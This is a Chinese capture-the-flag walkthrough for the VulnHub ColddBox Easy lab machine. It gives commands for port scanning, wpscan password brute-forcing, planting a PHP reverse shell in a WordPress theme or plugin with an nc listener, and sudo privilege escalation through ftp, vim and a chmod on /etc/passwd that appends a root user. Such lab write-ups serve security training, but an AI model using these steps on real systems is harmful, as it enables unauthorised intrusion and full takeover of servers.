VulnHub:colddbox easy

靶机下载地址

信息收集

主机发现

攻击机网段192.168.31.0/24,扫描同网段存活主机。

复制代码
nmap 192.168.31.0/24 -Pn -T4

发现靶机,IP为192.168.31.176。

端口扫描

扫描靶机开放端口。

复制代码
nmap 192.168.31.176 -A -p- -T4

开放了80,4512端口,注意ssh服务端口改到了4512端口上(后续如果要使用ssh登录需要加上-p 4512)。

web信息收集

访问80端口,首页如图:

根据首页信息,该网站由WordPress搭建。直接使用wpscan枚举用户名和密码,枚举出三个用户:philip,c0ldd,hugo,分别枚举密码。

复制代码
wpscan --url http://192.168.31.176 -e u,p,t
# 得到c0ldd,hugo,philip三个用户名,分别枚举密码
wpscan --url http://192.168.31.176 --passwords /usr/share/wordlists/nmap.lst --usernames c0ldd --max-threads 100

只有c0ldd用户枚举出密码:9876543210

拿到用户名和密码,尝试登录wordpress后台。访问/wp-login.php输入用户名密码,发现成功登录管理员后台。

getshell

WordPress getshell常用方法通过msf获取目标靶机shell在该靶机中无法成功,只能通过其他方式getshell,WordPress getshell的方法有:

  1. 将反弹shell写入网站模板中

  2. 将反弹shell压缩成zip,伪装成插件进行安装

  3. 将反弹shell添加到WordPress后台已安装的插件代码中

  4. 安装有漏洞的插件

下面演示两种常用的getshell方法。

方法1:网站模板

既然登录了管理员账户,就可以修改模板,在模板中写入反弹shell,访问即可。

例如,修改404.php模板的内容。

反弹shell脚本(php-reverse-shell)_php-reverse-shell.-CSDN博客

写入反弹shell脚本后,点击Update File上传成功才能利用。

复制代码
# 攻击机 端口号与反弹shell脚本内一致
nc -lvp port
# 访问http://192.168.31.176/wp-content/themes/twentyfifteen/404.php

成功getshell。获取一个交互式shell执行:python3 -c 'import pty;pty.spawn("/bin/bash")'

方法2:添加反弹shell到插件代码

在插件选项中看到已经安装了两个插件,随便启用一个(记得一定要启用),这里启用的是Hello Dolly插件。

点击Edit编辑插件代码,在代码中添加反弹shell脚本,点击Update File更新。

攻击机开启nc监听5555端口。成功getshell。

getshell后进行信息收集,在/var/www/html下找到一个hidden文件夹。

访问后得到的信息是:需要c0ldd用户修改hugo用户的密码,以便hugo登录并上传文章。

试过修改密码然后就不知道有啥用了。

同样在/var/www/html路径下cat wp-config.php找到一个数据库账号和密码。

账号:c0ldd

密码:cybersecurity

/home/c0ldd目录下发现user.txt,但是没有权限,c0ldd才有读权限。

既然只有c0ldd用户有读权限,就尝试切换到c0ldd用户,拿上面的密码登录c0ldd用户。

得到flag1,是一串base64加密字符。解密后是西班牙语:

Felicidades, primer nivel conseguido!

提权

sudo -l

vim,ftp,chmod这三个都可以用。

复制代码
# ftp
sudo ftp
!/bin/bash
​
#vim
sudo vim -c ':!/bin/sh'
​
# chmod
sudo chmod 777 /etc/passwd
openssl passwd -salt '12' 123456   //生成加密密码
12tir.zIbWQ3c  //上一步生成的加密密码
echo "akk:12tir.zIbWQ3c:0:0:ROOT:/root:/bin/bash" >> /etc/passwd //向/etc/passwd中写入一个root权限的用户akk

1、ftp提权演示如图:

2、vim提权演示如图:

3、chmod提权演示如图:

相关推荐
apocelipes3 小时前
Linux c 运行时获取动态库所在路径
linux·c语言·linux编程
scdifsn4 小时前
动手学深度学习12.7. 参数服务器-笔记&练习(PyTorch)
pytorch·笔记·深度学习·分布式计算·数据并行·参数服务器
DevSecOps选型指南4 小时前
2025软件供应链安全最佳实践︱证券DevSecOps下供应链与开源治理实践
网络·安全·web安全·开源·代码审计·软件供应链安全
ABB自动化4 小时前
for AC500 PLCs 3ADR025003M9903的安全说明
服务器·安全·机器人
努力学习的小廉4 小时前
深入了解linux系统—— 进程池
linux·运维·服务器
恰薯条的屑海鸥4 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十六期-SSRF模块)
数据库·学习·安全·web安全·渗透测试·网络安全学习
秃头菜狗5 小时前
各个主要目录的功能 / Linux 常见指令
linux·运维·服务器
2301_793102495 小时前
Linux——MySql数据库
linux·数据库
阿部多瑞 ABU5 小时前
主流大语言模型安全性测试(三):阿拉伯语越狱提示词下的表现与分析
人工智能·安全·ai·语言模型·安全性测试
jiunian_cn6 小时前
【Linux】centos软件安装
linux·运维·centos